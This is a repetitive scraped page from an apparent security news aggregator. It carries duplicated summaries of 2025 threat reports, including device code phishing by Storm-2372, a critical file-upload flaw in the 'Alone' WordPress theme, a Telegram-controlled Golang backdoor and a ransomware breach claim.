The Breach News

Microsoft Warns of Russian-Linked Hackers Using ‘Device Code Phishing’ to Compromise Accounts

February 14, 2025
Enterprise Security / Cyber Attack

Microsoft has highlighted a new threat group known as Storm-2372, linked to a series of cyberattacks that have targeted multiple sectors since August 2024. The attacks focus on government entities, NGOs, IT services, defense, telecommunications, healthcare, higher education, and the energy sector across Europe, North America, Africa, and the Middle East.

Evaluated with medium confidence to align with Russian interests, the threat actors utilize messaging platforms such as WhatsApp, Signal, and Microsoft Teams. They impersonate notable figures relevant to their targets to gain trust. The attacks employ a phishing method known as ‘device code phishing,’ which deceives users into logging into productivity applications, allowing the actors to capture the login tokens for malicious use.

Microsoft Warns of Russian-Linked Cyber Attack Group Utilizing ‘Device Code Phishing’ Tactics February 14, 2025 Enterprise Security / Cyber Attack Microsoft has issued an urgent advisory regarding a rising threat actor, designated as Storm-2372, which is reportedly linked to Russian cyber interests. Since August 2024, this group has launched a…

Read More

Microsoft Warns of Russian-Linked Hackers Using ‘Device Code Phishing’ to Compromise Accounts

February 14, 2025
Enterprise Security / Cyber Attack

Microsoft has highlighted a new threat group known as Storm-2372, linked to a series of cyberattacks that have targeted multiple sectors since August 2024. The attacks focus on government entities, NGOs, IT services, defense, telecommunications, healthcare, higher education, and the energy sector across Europe, North America, Africa, and the Middle East.

Evaluated with medium confidence to align with Russian interests, the threat actors utilize messaging platforms such as WhatsApp, Signal, and Microsoft Teams. They impersonate notable figures relevant to their targets to gain trust. The attacks employ a phishing method known as ‘device code phishing,’ which deceives users into logging into productivity applications, allowing the actors to capture the login tokens for malicious use.

Microsoft Uncovers Russian Hackers Aiming at Foreign Embassies

New Malware Exploit: ApolloShadow Targets Vulnerable Networks In a recent cybersecurity breach, researchers have identified a new malware strain dubbed ApolloShadow that exploits captive portal mechanisms to gain unauthorized access to systems. This sophisticated malware primarily targets Windows devices, taking advantage of their connectivity routines to execute its malicious agenda.…

Read MoreMicrosoft Uncovers Russian Hackers Aiming at Foreign Embassies

Vietnam Launches NDAChain; Tea App Data Breach Exposes User Information

Homepage > News > Business > Vietnam unveils NDAChain; Tea app hack leaks user data Vietnam is progressing towards a digital economic transformation with the announcement of a national blockchain platform designed to serve multiple key sectors. This initiative aims to leverage blockchain technology to bolster data protection, identity verification,…

Read MoreVietnam Launches NDAChain; Tea App Data Breach Exposes User Information

Hackers Target Critical Vulnerability in ‘Alone’ WordPress Theme to Take Over Websites Through Remote Plugin Installation

Jul 31, 2025
Vulnerability / Website Security

Threat actors are currently exploiting a serious security flaw in the “Alone – Charity Multipurpose Non-profit WordPress Theme,” allowing them to seize control of vulnerable websites. The vulnerability, identified as CVE-2025-5394, has a CVSS score of 9.8. Security researcher Thái An discovered and reported the issue. According to Wordfence, the flaw involves an arbitrary file upload that affects all plugin versions up to and including 7.8.3. It was patched in version 7.8.5, released on June 16, 2025. CVE-2025-5394 arises from a function called “alone_import_pack_install_plugin(),” which lacks a necessary capability check, enabling unauthenticated users to upload arbitrary plugins from remote sources through AJAX, thus executing code remotely. “This vulnerability allows an attacker without authentication to upload arbitrary files to a vulnerable site, leading to remote code execution…”

Hackers Exploit Severe Vulnerability in WordPress Theme, Compromising Numerous Sites On July 31, 2025, reports surfaced detailing a critical security vulnerability in the “Alone – Charity Multipurpose Non-profit WordPress Theme,” which has become a focal point for cybercriminals. This flaw, identified as CVE-2025-5394, has garnered an alarming CVSS score of…

Read More

Hackers Target Critical Vulnerability in ‘Alone’ WordPress Theme to Take Over Websites Through Remote Plugin Installation

Jul 31, 2025
Vulnerability / Website Security

Threat actors are currently exploiting a serious security flaw in the “Alone – Charity Multipurpose Non-profit WordPress Theme,” allowing them to seize control of vulnerable websites. The vulnerability, identified as CVE-2025-5394, has a CVSS score of 9.8. Security researcher Thái An discovered and reported the issue. According to Wordfence, the flaw involves an arbitrary file upload that affects all plugin versions up to and including 7.8.3. It was patched in version 7.8.5, released on June 16, 2025. CVE-2025-5394 arises from a function called “alone_import_pack_install_plugin(),” which lacks a necessary capability check, enabling unauthenticated users to upload arbitrary plugins from remote sources through AJAX, thus executing code remotely. “This vulnerability allows an attacker without authentication to upload arbitrary files to a vulnerable site, leading to remote code execution…”

New Golang-Based Backdoor Leverages Telegram Bot API for Stealthy C2 Operations

February 17, 2025
Threat Intelligence / Cyber Attack

Cybersecurity experts have revealed a new backdoor written in Golang that employs Telegram for command-and-control (C2) communications. Netskope Threat Labs, which analyzed the malware, suspects it may have origins in Russia. Security researcher Leandro Fróes commented, “The malware is compiled in Golang and functions as a backdoor. While it appears to be in active development, it is fully operational.” Upon execution, the backdoor verifies its location and specific file name—“C:\Windows\Temp\svchost.exe”—and if conditions aren’t met, it duplicates itself into the intended directory, launches the copied version, and then terminates its own process. A significant feature of this malware is its use of an open-source library that provides Golang bindings for the Telegram Bot API for C2 operations. This implementation includes…

New Golang-Based Backdoor Leverages Telegram Bot API for Evasive C2 Operations February 17, 2025 In a recent development within the cybersecurity landscape, researchers have uncovered a new backdoor malware written in Golang that employs the Telegram Bot API for its command-and-control (C2) operations. This malware, potentially originating from Russia, has…

Read More

New Golang-Based Backdoor Leverages Telegram Bot API for Stealthy C2 Operations

February 17, 2025
Threat Intelligence / Cyber Attack

Cybersecurity experts have revealed a new backdoor written in Golang that employs Telegram for command-and-control (C2) communications. Netskope Threat Labs, which analyzed the malware, suspects it may have origins in Russia. Security researcher Leandro Fróes commented, “The malware is compiled in Golang and functions as a backdoor. While it appears to be in active development, it is fully operational.” Upon execution, the backdoor verifies its location and specific file name—“C:\Windows\Temp\svchost.exe”—and if conditions aren’t met, it duplicates itself into the intended directory, launches the copied version, and then terminates its own process. A significant feature of this malware is its use of an open-source library that provides Golang bindings for the Telegram Bot API for C2 operations. This implementation includes…

The Kremlin’s Cunning Hacking Group Leverages Russian ISPs to Deploy Spyware

The Russian hacker group Turla, known for their advanced cyberespionage techniques, has been linked to a new spying method that demonstrates their sophisticated approach to cyber operations. This group has made headlines for utilizing unorthodox methods, such as embedding malware communications in satellite connections or commandeering other hackers’ operations to…

Read MoreThe Kremlin’s Cunning Hacking Group Leverages Russian ISPs to Deploy Spyware

HHS Data Strategy Seeks to ‘Revitalize Health Technology’

Data Privacy, Data Security, Healthcare Voluntary Initiative Advocates for Standards and Patient Empowerment: A Privacy Perspective Marianne Kolbasuk McGee (HealthInfoSec) • July 31, 2025 President Donald Trump alongside leaders from the Department of Health and Human Services (HHS) announces a new strategy aimed at enhancing health data interoperability and access.…

Read MoreHHS Data Strategy Seeks to ‘Revitalize Health Technology’

SafePay Raises Alarm Over Ingram Micro Breach, Imposes Ransom Deadline – Dark Reading

SafePay Claims Ingram Micro Breach, Sets Ransom Deadline In a recent cybersecurity incident, SafePay has publicly accused Ingram Micro of suffering a significant data breach. The company, known for its global technology distribution, appears to be under threat after SafePay set a ransom deadline, escalating the urgency of the situation.…

Read MoreSafePay Raises Alarm Over Ingram Micro Breach, Imposes Ransom Deadline – Dark Reading